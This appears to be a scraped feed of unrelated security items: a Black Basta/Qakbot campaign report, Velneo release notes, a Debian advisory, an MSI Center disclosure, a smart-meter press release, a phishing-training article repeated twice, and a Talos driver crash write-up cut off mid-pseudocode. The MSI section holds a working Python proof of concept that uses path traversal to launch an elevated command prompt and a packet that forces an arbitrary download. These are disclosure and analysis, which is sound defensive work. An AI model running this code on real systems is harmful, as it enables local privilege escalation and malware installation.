The ransomware group is using Qakbot to make the initial point of entry before moving laterally within an organization’s network.

The Black Basta ransomware group is using Qakbot malware — also known as QBot or Pinkslipbot — to perpetrate an aggressive and widespread campaign using an .IMG file as the initial compromise vector.

More than 10 different customers have been targeted by the campaign in the last two weeks, mostly focused on companies based in the US.

According to a threat advisory posted by the Cybereason Global SOC (GSOC) on Nov. 23, the infections begin with either a spam or phishing email, which contain malicious URL links, with Black Basta deploying Qakbot as the primary method to maintain a presence on victims’ networks.

"In this latest campaign, the Black Basta ransomware gang is using Qakbot malware to create an initial point of entry and move laterally within an organization's network," the report noted.

While Qakbot started out as a banking Trojan, different groups have augmented its capabilities with additional modules, using it as an infostealer, a backdoor, and a downloader. Qakbot has also recently switched up its method of delivering its malicious payload — from JavaScript to VBS.

"We also observed the threat actor using Cobalt Strike during the compromise to gain remote access to the domain controller," the research team noted. "Finally, ransomware was deployed, and the attacker then disabled security mechanisms, such as EDR and antivirus programs."

The report singles out the swiftness with which the attacks are taking place, with ransomware deployed in less than half a day after obtaining domain administrator privileges in under two hours.

In more than one attack, the GSOC team observed the threat actor disabling DNS services, locking the victim out of the network, and making recovery more difficult.

"Given all of these observations, we recommend that security and detection teams keep an eye out for this campaign, since it can quickly lead to severe IT infrastructure damage," the report noted.

The report encourages organizations to identify and block malicious network connections, reset Active Directory access, engage incidence response, and cleanse compromised machines, which includes isolating and reimaging all infected machines.

**Qakbot Ramps Up Operations, Adding Capabilities**

The Qakbot group has recently ramped up its operations, infecting systems, installing attack frameworks, and selling access to other groups, including Black Basta.

In September, it resumed expanding its access-as-a-service network, successfully compromising hundreds of companies with common second-stage payloads, including Emotet malware and two popular attack platforms.

In June Qakbot operators were observed using DLL sideloading to deliver malware, a technique that places legitimate and malicious files together in a common directory to avoid detection.

**Black Basta Backed by FIN7**

Black Basta, one of this year's most prolific ransomware families, offers its ransomware-as-a-service (RaaS) offering in various underground forums, which means multiple operators have access to Black Basta in their toolset, making attribution difficult.

The group has been active since at least February, although it was only discovered two months later targeting VMware ESXi virtual machines running on enterprise Linux servers, encrypting files inside a targeted volumes folder. The group has targeted English-speaking countries on a global scale.

Evidence has recently emerged that FIN7, a financially motivated cybercrime organization estimated to have stolen well over $1.2 billion since surfacing in 2012, is behind Black Basta, according to researchers at SentinelOne.

Black Basta Gang Deploys Qakbot Malware in Aggressive Cyber Campaign


Velneo vClient on its 28.1.3 version, could allow an attacker with knowledge of the victims's username and hashed password to spoof the victim's id against the server.



Es conveniente leer la información siguiente antes de actualizar a esta versión

**

**Información importante sobre los ejecutables de 32 bits para Windows**



**

Esta es la última versión en la que se distribuirán los ejecutables de 32 bits para Windows.

**

**Los comandos y opciones de compactar y vaciar tabla estaban disponibles solamente en servidores cloud y con suscripción (Resuelta en 32.1)**



**

**

Nuevo sistema de activación de licencias de Velneo vServer



**

A partir de la versión 32 cambia el sistema de licenciamiento y las licencias se activarán desde

Velneo vAdmin

. Haz clic

aquí

para ampliar información al respecto.

En mi Velneo, ahora verás que una licencia tiene dos códigos distintos, uno con el formato **VLS-XXXX-XXX**, que será el que se deberá usar para activarla con la versión 32 y superiores y el otro, que usaremos cuando queramos activarla en servidores de la versión 31 o anteriores, que se seguirá activando con

Velneo vActivator

.

**

A partir de esta versión todos los servidores arrancarán con protocolo VATPS



**

El

protocolo VATPS

permite establecer conexiones seguras estándar TLS/SSL lo que provee de privacidad e integridad a las comunicaciones en red entre todos los componentes de Velneo. Es decir, no solo la comunicación se envía cifrada entre los componentes, si no que es inviolable, ya que garantiza que nadie puede modificar la información que se transmite, además de garantizarnos con qué servidor nos hemos conectado.

**

Incidencia con controles dibujo en dispositivos con procesadores Apple Silicon con sistema operativo Ventura



**

Hemos detectado una incidencia que produce un efecto de ralentización del interfaz la primera vez durante unos segundos cuando visualizamos o editamos un formulario con un control dibujo/objeto dibujo. Parece una incidencia de sistema operativo, ya que este efecto se produce también en versiones anteriores ya publicadas en las que no se observaba ese comportamiento y ha comenzado a producirse tras la última actualización de macOS Ventura en equipos con procesadores Apple Silicon.

**

Mejoras de seguridad en validación de usuario y contraseña



**

Con el fin de mejorar la seguridad del

inicio de sesión

en Velneo, se evita enviar el hash de la contraseña, sustituyendo el sistema de login con uno más moderno y seguro.

En breve, aparecerá publicado en

CVE

con el fin de advertir y propiciar la actualización a esta versión.

**

Funciones remotas y compatibilidad con versiones anteriores de Velneo



**

Por defecto, un servidor de la 32 no permite recibir peticiones de ejecución de funciones remotas desde versiones anteriores. En el caso de que queramos hacer esto posible, debemos una clave beta en la máquina donde tengamos instalado el servidor de la versión 32.

Las claves beta son entradas en la rama **beta** de Velneo del registro del sistema operativo. Se recomienda generarlas desde un proceso con el comando de instrucción de proceso

Configuración de sistema: Escribir cadena de texto

para establecerlos, ejecutándolo en 3er plano. Los parámetros se resolverán como indicamos a continuación:

Configuración de sistema: Escribir cadena de texto ( "Velneo", "beta", "clave", "valor" ):

*   **Clave**: enableRetrocompatibildadFuncionesRemotas
    

*   **Valor**: 3BFD2F9B103174596FF78C23CE8DDE77EC917BEA
    

**

Rejillas: la CSS que se aplica a los ítems de rejillas, se aplican también a las columnas de campos de tipo objeto texto y objeto dibujo



**

En versiones anteriores no se aplicaban correctamente las CSS de ítem de

rejilla

en columnas de campos de tipo objeto texto enriquecido y objeto dibujo; ahora hemos mejorado la plataforma para que también las aplique.

Al aplicar el ajuste del texto (wordwrap) en una CSS, el ajuste en textos largos puede resultar distinto.

**

Cómo activar la nueva interfaz Velneo vAdmin



**

Velneo vAdmin estrena nueva interfaz. Para probarla no tienes más que

activarla

.

**

Funcionalidades no disponibles en la nueva interfaz de Velneo vAdmin y en Velneo vAdmin Web



**

*   Alta y modificación de
    
    disco
    
    .
    

**

Mejoras de rendimiento en beta



**

Si quieres disfrutar de la versión beta de estas opciones, debes activar ciertas claves beta correspondiente en el cliente (en el caso de los objetos de interfaz) y también en el servidor (en el caso de procesos).

Las claves beta son entradas en la rama **beta** de Velneo del registro del sistema operativo. Se recomienda generarlas desde un proceso con el comando de instrucción de proceso

Configuración del sistema: escribir cadena texto

para establecerlos, ejecutándolo en 1º y 3º plano según corresponda. Los parámetros se resolverán como indicamos a continuación

Configuración de sistema: Escribir cadena de texto ( "Velneo", "beta", "clave", "valor" )

Ejecutar la aplicación, lanzar el proceso en primero y/o tercer plano, según corresponda.

En el ámbito del cliente, las claves serán operativas en siguientes sesiones que se lancen del mismo.

En el ámbito del servidor, las claves serán operativas en cuanto se reinicie.

Estas son las distintas claves beta que podemos configurar:

*   ​
    
    Rejillas
    
    estándar, carga y movimiento optimizado (requiere el
    
    estilo
    
    _Optimizado_):
    
    *   **Clave**: optimizarRejillasClient
        
    
    *   **Valor**: 8DF627183E075E86BADCF82C11D4F931E8BF62D8
        
    

*   *   **Clave**: optimizarFormulariosClientFormulas
        
    
    *   **Valor**: ED979A19EEFC93EE0E4F58FB93F432BF258E1E33
        
    

*   Procesos, optimización de parámetros:
    
    *   **Clave**: optimizarInstruccion
        
    
    *   **Valor**: F15868161C0B05825E38ADE94001D5D9926CDFB7
        
    
    *   **Ámbito**: cliente y servidor.
        
    

*   *   **Valor**: 11B804B93A06DFED1838D5B21F309414B881EEDF
        
    
    *   **Ámbito**: cliente y servidor.
        
    

*   Nuevo motor
    
    Javascript
    
    con optimización de memoria y concurrencia:
    
    *   **Clave**: enableSombrasJSClass
        
    
    *   **Valor**: F0835AF8367C2AE76BC7804F8183EEB5529C5ADF
        
    
    *   **Ámbito**: cliente y servidor.
        
    

Última actualización 6mo ago

CVE-2021-45036: Notas de la versión

Debian Linux Security Advisory 5290-1 - Apache Commons Configuration, a Java library providing a generic configuration interface, performs variable interpolation, allowing properties to be dynamically evaluated and expanded. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5290-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyNovember 28, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : commons-configuration2CVE ID         : CVE-2022-33980Debian Bug     : 1014960Apache Commons Configuration, a Java library providing a generic configurationinterface, performs variable interpolation, allowing properties to bedynamically evaluated and expanded. Starting with version 2.4 and continuingthrough 2.7, the set of default Lookup instances included interpolators thatcould result in arbitrary code execution or contact with remote servers. Theselookups are: - "script" - execute expressions using the JVM script executionengine (javax.script) - "dns" - resolve dns records - "url" - load values fromurls, including from remote server applications using the interpolationdefaults in the affected versions may be vulnerable to remote code execution orunintentional contact with remote servers if untrusted configuration values areused.For the stable distribution (bullseye), this problem has been fixed inversion 2.8.0-1~deb11u1.We recommend that you upgrade your commons-configuration2 packages.For the detailed security status of commons-configuration2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/commons-configuration2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmOEnGNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeTfixAAmUQeUZMfhGZTOpy54duxupRdD9aUOa7K2wYvEt2QmHa+2rusZX2NZnFqveVHX7N1n2gZq8LJVOUMQjWhtjO1mz73+0jmmzSlYtbarscflGRmRCn7HlHwnjAQKFbhRf9DAkKbXVLquwMbviNZthhNg4Y01XvTWrxBorjqMI5DSl1cE5nH7c0gTOSJQAuEuOnF2Rf9RHHzabRhrGTiWDgRjstMwUQm3eUet3U8Mcm7hpNGKvJt+rlnlY3k+tH6FkDqr7Vo+Ban2eEzmtlxsZM75HlsIg+oq7HaRtmd/L0wthlF/VcZuCYAqJsHRF5L1Xrvsp3/rGXcKV1y5mOCHI+WUvgYRyoir6xW5UMlc7wABMBlsMGN5HcUN+5YRDTairCWGULTpD3iRv+Nj61JLE9T9tBqX4j+mJ4TlRW5Sl26o/yX6pFZpb2Fj896awb7ZRJaq1iV1jhSmxTTh5EdR9/JxJyB+CXN3gAAlWrffJhJaQZW43jIHKO6+J70GJZfx5s+c6WXpuZQ51qMfEvghOPgCuyB5MIRMVazEGXrU++xylUfTjwepZ5akEipSaMaCpnk1EecVMiLdeu2tlrJgm8XJdGXcofUpryM76dgDNe1ghKbTL3AEdb2C9+en5xGDJDXHm0xR99oIHoUU6l8k8MggkahuuugF9P09FohGC6Z8a8=JxWQ-----END PGP SIGNATURE-----

Debian Security Advisory 5290-1

An issue in the component MSI.TerminalServer.exe of MSI Center v1.0.41.0 allows attackers to escalate privileges via a crafted TCP packet.

Missing input validation and missing authentication allow attackers with the ability to connect to TCP/IP ports on localhost:26822 (e.g. any low-privileged user space process) to download and/or launch arbitraty executables with elevated privileges.

**General**

*   Affected product: MSI Center by Micro-Star Int’l Co., Ltd.
*   Affected version: < 1.0.45.0, e.g. 1.0.41.0
*   CVE-2022-31877

**Description**

MSI Center, a tool suite provided by MSI to configure and manage MSI mainboards, includes an executable MSI.TerminalServer.exe which is installed as a privileged service by default and allows incoming TCP/IP connections on localhost:26822. Via the TCP/IP channel, in version 1.0.41.0, it accepts several JSON-formatted command packets without any authentication, including commands which download files from the web and launch executables with elevated privileges.

While these commands are meant to download and install updates of MSI Center, missing authentication allows attackers to trigger a download of arbitrary files form the web to the local file system. Missing input validation enables attackers to launch arbitrary executables, including the downloaded ones, with elevated permissions by employing path traversal techniques.

Combined, these vulnerabilities could, for example, serve as an entry point for user-space applications (like email attachments) to fully compromise a system, including installation of malware or ransomware.

**Proof of Concept**

The following simple Python example will start an elevated Administrator command prompt when executed on a machine running MSI Center.

    import socket
    import json
    
    packet = {
        "Type": "RunSetupModule",
        "Content": json.dumps({
            "Dependent": [{
                "File": "..\\..\\..\\Windows\\system32\\cmd.exe"
            }],
            "DependentIndex": 0,
            "ProgressStatus": 21
        })
    }
    
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(('localhost', 26822))
        s.sendall(json.dumps(packet).encode('utf8'))

Similarly, an arbitray file download can be triggered via the DownloadModule packet type:

    packet = {
        "Type": "DownloadModule",
        "Content": json.dumps({
            "ProcessURL": "https://example.com/foo.exe",
            "Dependent": [{
                "File": "foo.exe"
            }],
            "DependentIndex": 0
        })
    }

**Timeline**

*   May 19, 2022: Contacted vendor with a detailed report and PoC
*   May 25, 2022: Issue partially confirmed by vendor
*   May 25, 2022: Supplied more details including screencast of PoC
*   May 27, 2022: Vendor confirms they are working on a fix
*   June 3, 2022: CVE number assigned
*   June 3, 2022: Vendor reports the issue is fixed in MSI.TerminalServer.exe 3.2022.0527.01 by introducing CA signature validation before launching executables
*   July 5, 2022: I was able to update to a recent MSI Center version and confirm the issue has been fixed (i.e. the PoC is no longer working)
*   July 8, 2022: Public disclosure

**Thank You and Side Note**

I would like to thank MSI for quickly fixing this issue. However, it was difficult to find a contact in MSI to report this issue. I would like to encourage MSI to establish and publish a process to report security vulnerabilities in their products and add an easier way to contact security, without going through various tiers of technical support first. A first step could be to set up a dedicated email address and a /.well-known/security.txt file for easily finding contact information.

CVE-2022-31877: Privilege Escalation in MSI Center – patsch.dev

The DLMS-compatible, zero-trust meter-level security is built into the Renesas smart meter solutions, enabling smart meter manufacturers to get to market faster with built-in advanced security solutions.

**HOD HASHARON, Israel, Nov. 28, 2022 /PRNewswire/** — NanoLock Security, a leading cybersecurity provider for IIoT and OT devices and machines, today announces built-in, zero-trust meter-level cyber security protection for Renesas Electronics Corp. customers' smart meter products.

As the global energy economy worsens and cyberthreats like energy fraud and theft grow more frequent, Renesas' customers in meter manufacturing will now have NanoLock Security's DLMS compatible, zero-trust cyber protection built-in to their meters with no impact on performance, functionality, or deployment speed, giving them a significant competitive advantage.

This new solution gives Renesas' customers, renowned smart meter manufacturers, the ability to quickly build a product that is secure from all attack vectors, including insider manipulation and human error, without any disruptions to meter operations or product time to market.

"Edge devices like advanced metering infrastructure (AMI) are vulnerable targets for cyber attackers and can compromise service integrity, revenue, and safety," said David Stroud, Chief Revenue Officer, NanoLock Security. "With our meter-level protection built into Renesas metering solutions, Renesas customers can now bring secure and tamper-proof smart meters to the market faster, a critical edge in a hotly competitive industry."

NanoLock will be exhibiting the new solution at the Enlit Europe show in Frankfurt Germany at Altlatica Booth #12.1.C132.

To find out how manufacturers can get the new Renesas MCUs into their smart meters, visit the Renesas RL78 Partner page. To learn more about NanoLock, visit NanoLockSecurity.com.

**About NanoLoc****k Security**

NanoLock Security protects the operational integrity of connected devices, smart meters, and machines against cyber events and human error to maintain business continuity, improve safety and safeguard revenues.

Trusted by critical infrastructure customers, such as utilities, industrial and manufacturing companies, NanoLock Security protects power generation and energy management, industrial, water and wastewater plants, as well as food & beverage manufacturing, while ensuring compliance with international security standards and guidelines. NanoLock is headquartered in Israel with offices in the US, Europe, and Japan. Visit www.nanolocksecurity.com for more information and follow NanoLock on Twitter and LinkedIn.

SOURCE: NanoLock Security

NanoLock Brings Built-In Meter-Level Cybersecurity to Renesas Customers

It's not news that phishing attacks are getting more complex and happening more often. This year alone, APWG reported a record-breaking total of 1,097,811 phishing attacks. These attacks continue to target organizations and individuals to gain their sensitive information.

**The hard news:** they're often successful, have a long-lasting negative impact on your organization and employees, including:

*   Loss of Money
*   Reputation damage
*   Loss of Intellectual property
*   Disruptions to operational activities
*   Negative effect on company culture

**The harder news:** These often could have been easily avoided.

Phishing, educating your employees, and creating a cyber awareness culture? These are topics we're sensitive to and well-versed in. So, how can you effectively protect your organization against phishing attempts? These best practices will help transform your employees' behavior and build organizational resilience to phishing attacks.

****Plan for total workforce training:****

According to the 2022 Tessian Security Cultures Report, "security leaders underestimate just how much they should be a part of the employee experience" across onboarding, role changes, offboarding, relocations, and day-to-day activities.

But we've repeatedly seen that ad hoc, scattershot employee training attempts don't work. If you want sufficient internal defenses against sophisticated phishing threats, you should train 100% of your employees monthly.

Granted, it isn't easy if your team is growing rapidly or spread across different locations and time zones. Yet doing anything less than 100% employee training leaves you with too many security holes and opportunities for hackers to break in. Unfortunately, it also means you have no way of knowing your employees' level of threat awareness or whether they know how to react to threats. You might be missing your weakest link or getting into a scenario that could have been easily avoided.

****Apply Continuous Training****

Ever been told there'll be a fire evacuation drill? Likely, you weren't caught off guard when the practice started and could have paid more attention. That's the thing about drills; they're in place to prepare us for present and future threats.

Cybersecurity training is no different. While it can quickly become ticking a compliance box to satisfy minimum requirements. To prevent it, you need to catch your staff off guard. Knowing that a threat could present itself at any time keeps employees vigilant and accountable between more extensive training campaigns.

It would be best if you kept giving your employees these unexpected opportunities to learn on an ongoing basis. They will likely make easily avoidable mistakes if they only receive occasional simulations. You might miss new employees without sufficient cybersecurity training, or it might take time for them to revisit and build on this training.

**The solution:** Conducting consistent cybersecurity training is the best way to keep it top of mind for everyone—train for yesterday, today, and tomorrow.

****Deploy Adaptive Content****

You might use cybersecurity understanding or departments as categories. Start by segmenting your workforce into groups. Then, develop adaptive training based on each group's needs - and even based on individual behavior. That's critical to adequately address the challenges of given scenarios of future attack campaigns.

These can include data or password requests, messages from legitimate sources, or realistic content tailored to an organization's specific role or department.

You strengthen employees' defenses by adapting your content to individual responses and specific attack vectors. Doing so turns the human element from a security gap to a security advantage.

****Localize Your Cybersecurity Training****

English might be your corporate language, but it might not be every employee's mother tongue, and cultural contexts might be perceived differently in some branches.

Using employees' mother tongue within a location's cultural context will dramatically enhance their learning retention. By citing local references (such as national holidays, significant news sources, popular social media platforms, and more), you make your simulations more believable and relatable. Your employees will likely pay better attention during training and will be less susceptible to attacks.

Lastly, there could be different implications regarding email compliance standards in different places. Ensure your team is aware of that and incorporate the necessary precautions in these locations' training.

****Back Your Cyber Training with Data Science****

In our experience, one in every five employees is a "serial clicker." Serial clickers click, open, and download attachments that often place them and your organization in danger. They might be a new or existing employee. We've seen it all, from entry-level positions to company stakeholders.

They're not trained or equipt to reliably identify phishing attacks, nor understand how dangerous and their destructive impact. So they keep clicking links in emails that they shouldn't have opened.

**The good news:** We believe serial clickers can be cured because we've seen it repeatedly happen with employee training and education.

We know that serial clickers are just some of the ones to worry about. Employees respond differently to a variety of attack vectors. It's recommended to use data science to understand how employee groups within your organization - from new hires, executive leadership, and veteran employees - respond to potential threats.

Once you analyze the data to understand these groups' behavior, you can develop programs that shift them toward a more discerning approach to email management based on their specific needs and their current place in their cybersecurity awareness journey.

These programs must include expert knowledge, adjusted frequency, timely reminders, custom simulations, and training content designed for highly susceptible groups while respecting employees' privacy.

****Automate Your Cybersecurity Education****

Regardless of the size of your organization, the complexity required to run a training program like the one described above can be challenging. Whether you're looking at it from the perspective of time, resources, or economics, it's almost impossible without a truly automated solution that has expert knowledge baked into the software.

CybeReady provides a fully-automated platform powered by machine learning technology. It mitigates the risks of human error through an educational approach that continuously provides frequent, adaptive, engaging training. Get in touch today to foster a culture that cares, retains information to keep your organization safe, and feels accountable. Make your organization cyber-ready. Learn how you can upgrade your security awareness program with a short, perosanilized demo.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The 5 Cornerstones for an Effective Cyber Security Awareness Training

It's not news that phishing attacks are getting more complex and happening more often. This year alone, APWG reported a record-breaking total of 1,097,811 phishing attacks. These attacks continue to target organizations and individuals to gain their sensitive information. 
The hard news: they're often successful, have a long-lasting negative impact on your organization and employees, including:

It's not news that phishing attacks are getting more complex and happening more often. This year alone, APWG reported a record-breaking total of 1,097,811 phishing attacks. These attacks continue to target organizations and individuals to gain their sensitive information.

**The hard news:** they're often successful, have a long-lasting negative impact on your organization and employees, including:

*   Loss of Money
*   Reputation damage
*   Loss of Intellectual property
*   Disruptions to operational activities
*   Negative effect on company culture

**The harder news:** These often could have been easily avoided.

Phishing, educating your employees, and creating a cyber awareness culture? These are topics we're sensitive to and well-versed in. So, how can you effectively protect your organization against phishing attempts? These best practices will help transform your employees' behavior and build organizational resilience to phishing attacks.

****Plan for total workforce training:****

According to the 2022 Tessian Security Cultures Report, "security leaders underestimate just how much they should be a part of the employee experience" across onboarding, role changes, offboarding, relocations, and day-to-day activities.

But we've repeatedly seen that ad hoc, scattershot employee training attempts don't work. If you want sufficient internal defenses against sophisticated phishing threats, you should train 100% of your employees monthly.

Granted, it isn't easy if your team is growing rapidly or spread across different locations and time zones. Yet doing anything less than 100% employee training leaves you with too many security holes and opportunities for hackers to break in. Unfortunately, it also means you have no way of knowing your employees' level of threat awareness or whether they know how to react to threats. You might be missing your weakest link or getting into a scenario that could have been easily avoided.

****Apply Continuous Training****

Ever been told there'll be a fire evacuation drill? Likely, you weren't caught off guard when the practice started and could have paid more attention. That's the thing about drills; they're in place to prepare us for present and future threats.

Cybersecurity training is no different. While it can quickly become ticking a compliance box to satisfy minimum requirements. To prevent it, you need to catch your staff off guard. Knowing that a threat could present itself at any time keeps employees vigilant and accountable between more extensive training campaigns.

It would be best if you kept giving your employees these unexpected opportunities to learn on an ongoing basis. They will likely make easily avoidable mistakes if they only receive occasional simulations. You might miss new employees without sufficient cybersecurity training, or it might take time for them to revisit and build on this training.

**The solution:** Conducting consistent cybersecurity training is the best way to keep it top of mind for everyone—train for yesterday, today, and tomorrow.

****Deploy Adaptive Content****

You might use cybersecurity understanding or departments as categories. Start by segmenting your workforce into groups. Then, develop adaptive training based on each group's needs - and even based on individual behavior. That's critical to adequately address the challenges of given scenarios of future attack campaigns.

These can include data or password requests, messages from legitimate sources, or realistic content tailored to an organization's specific role or department.

You strengthen employees' defenses by adapting your content to individual responses and specific attack vectors. Doing so turns the human element from a security gap to a security advantage.

****Localize Your Cybersecurity Training****

English might be your corporate language, but it might not be every employee's mother tongue, and cultural contexts might be perceived differently in some branches.

Using employees' mother tongue within a location's cultural context will dramatically enhance their learning retention. By citing local references (such as national holidays, significant news sources, popular social media platforms, and more), you make your simulations more believable and relatable. Your employees will likely pay better attention during training and will be less susceptible to attacks.

Lastly, there could be different implications regarding email compliance standards in different places. Ensure your team is aware of that and incorporate the necessary precautions in these locations' training.

****Back Your Cyber Training with Data Science****

In our experience, one in every five employees is a "serial clicker." Serial clickers click, open, and download attachments that often place them and your organization in danger. They might be a new or existing employee. We've seen it all, from entry-level positions to company stakeholders.

They're not trained or equipt to reliably identify phishing attacks, nor understand how dangerous and their destructive impact. So they keep clicking links in emails that they shouldn't have opened.

**The good news:** We believe serial clickers can be cured because we've seen it repeatedly happen with employee training and education.

We know that serial clickers are just some of the ones to worry about. Employees respond differently to a variety of attack vectors. It's recommended to use data science to understand how employee groups within your organization - from new hires, executive leadership, and veteran employees - respond to potential threats.

Once you analyze the data to understand these groups' behavior, you can develop programs that shift them toward a more discerning approach to email management based on their specific needs and their current place in their cybersecurity awareness journey.

These programs must include expert knowledge, adjusted frequency, timely reminders, custom simulations, and training content designed for highly susceptible groups while respecting employees' privacy.

****Automate Your Cybersecurity Education****

Regardless of the size of your organization, the complexity required to run a training program like the one described above can be challenging. Whether you're looking at it from the perspective of time, resources, or economics, it's almost impossible without a truly automated solution that has expert knowledge baked into the software.

CybeReady provides a fully-automated platform powered by machine learning technology. It mitigates the risks of human error through an educational approach that continuously provides frequent, adaptive, engaging training. Get in touch today to foster a culture that cares, retains information to keep your organization safe, and feels accountable. Make your organization cyber-ready. Learn how you can upgrade your security awareness program with a short, perosanilized demo.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

A null pointer dereference vulnerability exists in the handle_ioctl_83150 functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

**SUMMARY**

A null pointer dereference vulnerability exists in the handle\_ioctl\_83150 functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Callback technologies CBFS Filter 20.0.8317

**PRODUCT URLS**

CBFS Filter - https://www.callback.com/cbfsfilter/

**CVSSv3 SCORE**

6.2 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-476 - NULL Pointer Dereference

**DETAILS**

A windows device driver is almost like a kernel DLL that, once loaded, provides additional features. In order to communicate with these device drivers, Windows has a major component named Windows I/O Manager. The Windows IO Manager is responsible for the interface between user applications and device drivers. It implements I/O Request Packets (IRP) to enable the communication with the devices drivers, answering to all I/O requests. For more information see the Microsoft website.

The driver is responsible for creating a device interface with different functions to answer to specific codes, named major code function. If the designer wants to implement customized functions into a driver, there is one major function code named IRP_MJ_DEVICE_CONTROL. By handling such major code function, device drivers will support specific I/O Control Code (IOCTL) through a dispatch routine.

The Windows I/O Manager provides three different methods to enable the shared memory: Buffered I/O, Direct I/O, Neither I/O.  
Without getting into the details of the IO Manager mechanisms, the method Buffered I/O is often the easiest one for handling memory user buffers from a device perspective.  
The I/O Manager is providing all features to enable device drivers sharing buffers between userspace and kernelspace. It will be responsible for copying data back and forth.

Let’s see some examples of routines (which you should not copy as is) that explain how things work.  
When creating a driver, you’ll have several functions to implement, and you’ll find some dispatcher routines to handle different IRP as follows:

    extern "C"
    NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT pDriverObject, _In_ PUNICODE_STRING RegistryPath)
    {
     [...]
            pDriverObject->DriverUnload = DriverUnload;
            pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverIOctl;
            pDriverObject->MajorFunction[IRP_MJ_CREATE] = DriverCreate;
            pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverClose;
    [...]
    }
    

The DriverEntry is the function main for a driver. This is the place where initializations start.

We can see for example the pDriverObject which is a PDRIVER_OBJECT object given by the system to associate different routines, to be called against specific codes, into the Majorfunction table IRP_MJ_DEVICE_CONTROL for DriverIOctl etc.

Then later inside the driver you’ll see the implementation of the DriverIOctl routine responsible for handling the IOCTL code. It can be something like below:

    NTSTATUS DriverIOctl(PDEVICE_OBJECT pDevObject, PIRP pIrp)
    {
       [...]
        auto pIrpSp = IoGetCurrentIrpStackLocation(pIrp);
        switch (pIrpSp->Parameters.DeviceIoControl.IoControlCode)
        {
    
        case IO_CREATE_EXAMPLE:
                ioctl_inbuffer_data = (ioctl_inbuffer*)pIrp->AssociatedIrp.SystemBuffer;
                auto InputBufferLength = pIrpSp->Parameters.DeviceIoControl.InputBufferLength;
                auto OutputBufferLength = pIrpSp->Parameters.DeviceIoControl.OutputBufferLength;
         [...] some code
    
            pIrp->IoStatus.Information = 0;
            pIrp->IoStatus.Status = status;
    
            break;
         }
         
         pIrp->IoStatus.Information = some value;
         pIrp->IoStatus.Status = status;
         return status;
    }
    

First we can see the pIrp pointer to an IRP structure (the description would be out of the scope of this document). Keep in mind this pointer will be useful for accessing data.  
So here for example we can observe some switch-case implementation depending on the IoControlCode IOCTL. When the device driver gets an IRP with code value IO_CREATE_EXAMPLE, it performs the operations below the case. To get into the buffer data exchanged between userspace and kernelspace and vice-versa, we’ll look into SystemBuffer passed as an argument through the pIrp pointer.

On the device side, the pointer inside an IRP represents the user buffer, usually a field named Irp->AssociatedIrp.SystemBuffer, when the buffered I/O mechanism is chosen. The specification of the method is indicated by the code itself.  
On the userspace side, an application would need to gain access to the device driver symbolic link if it exists, then send some ioctl requests as follows:

    success  = ::DeviceIoControl(
        ghDevice,
        IO_CREATE_EXAMPLE,                  // control code
        &gpIoctl,                           // input buffer
        sizeof(struct ioctl_inbuffer),      // input buffer length
        &gpIoctl,                           // output buffer
        sizeof(struct ioctl_inbuffer),      // output buffer length
        &returned,
        nullptr
    );
    

Such a call will result in an IRP with a major code IRP_MJ_DEVICE_CONTROL and a control code to IO_CREATE_EXAMPLE. The buffer passed from userspace here as input gpIoctl, and output will be accessible from the device driver in the kernelspace via pIrp->AssociatedIrp.SystemBuffer. The lengths specified on the DeviceIoControl parameters will be used to build the IRP, and the device would be able to get them into the InputBufferLength and the OutputBufferLength respectively.

Now below we’ll see one example of sending a correct output buffer length directly without providing the driver some previous context which can lead to different behaviors and more frequently a local denial of service and blue screen of death through the usage of the device driver cbfilter20.

After the system has normally booted and the driver is running, sending an IOCTL 0x83150 with a valid buffer input size and some specific data length leads to the following situation

      CONTEXT:  ffff9c0ee2b66560 -- (.cxr 0xffff9c0ee2b66560)
        rax=0000000000001000 rbx=0000000000000000 rcx=0000000000000000
        rdx=ffffc408362e0a10 rsi=ffffc4083492a570 rdi=0000000000000000
        rip=fffff80258bc4eb4 rsp=ffff9c0ee2b66f60 rbp=ffff9c0ee2b67150
         r8=ffffc40839fe1a30  r9=0000000000083150 r10=fffff80258ba5780
        r11=0000000000000000 r12=ffffc4083a7740c0 r13=ffffc408362e0940
        r14=ffffc40839fe1a01 r15=0000000000000000
        iopl=0         nv up ei pl nz na pe nc
        cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050302
        cbfilter20!handle_ioctl_83150+0xd0:
        fffff802`58bc4eb4 488b4308        mov     rax,qword ptr [rbx+8] ds:002b:00000000`00000008=????????????????
        Resetting default scope
    
        PROCESS_NAME:  python.exe
    

When looking at pseudo code corresponding to the culprit function we can see the following:

    LINE1   __int64 __fastcall handle_ioctl_83150(_DEVICE_OBJECT *a1, PIRP a2)
    LINE2   {
            [...]
    LINE71    v3 = 0i64;
    LINE72    Object = 0i64;
    LINE73    v4 = 0;
    LINE74    SectionHandle = 0i64;
